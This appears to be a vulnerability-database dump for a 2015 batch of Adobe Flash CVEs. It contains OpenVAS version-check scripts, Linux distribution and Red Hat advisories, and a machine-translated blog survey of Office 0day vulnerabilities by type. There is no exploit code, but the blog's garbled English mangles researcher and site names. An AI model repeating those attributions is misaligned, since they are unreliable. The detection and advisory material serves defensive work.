\"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:22:46 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before version\n 13.0.0.302, and 14.x through 18.x before 18.0.0.203 versions on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.302 or 18.0.0.203 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n 
script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"13.0.0.302\"))\n{\n fix = \"13.0.0.302\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"18.0.0.202\"))\n{\n fix = \"18.0.0.203\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:09", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "openvas", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", 
"CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805902", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805902", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805902\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:07:29 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due 
to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before version\n 13.0.0.302, and 14.x through 18.x before 18.0.0.203 versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.302 or 18.0.0.203 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"13.0.0.302\"))\n{\n fix = 
\"13.0.0.302\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"18.0.0.202\"))\n{\n fix = \"18.0.0.203\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "altlinux": [{"lastseen": "2022-06-10T03:07:00", "description": "3:11-alt47 built July 8, 2015 Sergey V Turchin in task [#146142](<https://git.altlinux.org/tasks/146142/>) \n--- \nJuly 8, 2015 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2014-0578, CVE-2015-3097, CVE-2015-3114, CVE-2015-3115,\n CVE-2015-3116, CVE-2015-3117, CVE-2015-3118, CVE-2015-3119,\n CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-3123,\n CVE-2015-3124, CVE-2015-3125, CVE-2015-3126, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3130, CVE-2015-3131,\n CVE-2015-3132, CVE-2015-3133, CVE-2015-3134, CVE-2015-3135,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4429,\n CVE-2015-4430, CVE-2015-4431, CVE-2015-4432, CVE-2015-4433,\n CVE-2015-5116, CVE-2015-5117, CVE-2015-5118, CVE-2015-5119\n", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt47", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", 
"CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "2E7656C2D162693D3FA461626B8B7455", "href": "https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1874153338441013080", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:25", "description": "3:11-alt47 built July 8, 2015 Sergey V Turchin in task [#146143](<https://git.altlinux.org/tasks/146143/>) \n--- \nJuly 8, 2015 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2014-0578, CVE-2015-3097, CVE-2015-3114, CVE-2015-3115,\n CVE-2015-3116, CVE-2015-3117, CVE-2015-3118, CVE-2015-3119,\n CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-3123,\n CVE-2015-3124, CVE-2015-3125, CVE-2015-3126, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3130, CVE-2015-3131,\n CVE-2015-3132, CVE-2015-3133, CVE-2015-3134, CVE-2015-3135,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4429,\n CVE-2015-4430, CVE-2015-4431, CVE-2015-4432, CVE-2015-4433,\n CVE-2015-5116, CVE-2015-5117, CVE-2015-5118, CVE-2015-5119\n", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt47", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "C6DDB43D27A050C2835B948244DB9434", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1874153338441013080", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:58", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.481\"", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3113", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2015-07-10T00:00:00", "id": "GLSA-201507-13", "href": "https://security.gentoo.org/glsa/201507-13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Adobe Flash Player 11.2.202.481 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system. 
Adobe is aware of a report that an exploit targeting CVE-2015-5119 has been publicly published. This updates resolves heap buffer overflow vulnerabilities that could lead to code execution (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118). This updates resolves memory corruption vulnerabilities that could lead to code execution (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431). This updates resolves null pointer dereference issues (CVE-2015-3126, CVE-2015-4429). This updates resolves a security bypass vulnerability that could lead to information disclosure (CVE-2015-3114). This updates resolves type confusion vulnerabilities that could lead to code execution (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433). This updates resolves use-after-free vulnerabilities that could lead to code execution (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119). This updates resolves vulnerabilities that could be exploited to bypass the same-origin-policy and lead to information disclosure (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116). 
\n", "cvss3": {}, "published": "2015-07-09T08:09:20", "type": "mageia", "title": "Updated flash-player-plugin package fixes critical security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2015-07-09T08:09:20", "id": "MGASA-2015-0273", "href": "https://advisories.mageia.org/MGASA-2015-0273.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T20:36:55", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-16\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. 
An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2015-3117, CVE-2015-3118, CVE-2015-3119, CVE-2015-3120,\nCVE-2015-3121, CVE-2015-3122, CVE-2015-3123, CVE-2015-3124, CVE-2015-3126,\nCVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3130, CVE-2015-3131,\nCVE-2015-3132, CVE-2015-3133, CVE-2015-3134, CVE-2015-3135, CVE-2015-3136,\nCVE-2015-3137, CVE-2015-4428, CVE-2015-4429, CVE-2015-4430, CVE-2015-4431,\nCVE-2015-4432, CVE-2015-4433, CVE-2015-5117, CVE-2015-5118, CVE-2015-5119)\n\nMultiple security bypass flaws were found in flash-plugin that could lead\nto the disclosure of sensitive information. (CVE-2014-0578, CVE-2015-3114,\nCVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.481.\n", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "redhat", "title": "(RHSA-2015:1214) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", 
"CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2018-06-07T05:04:20", "id": "RHSA-2015:1214", "href": "https://access.redhat.com/errata/RHSA-2015:1214", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:22", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. 
\nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. 
Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. 
\nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. 
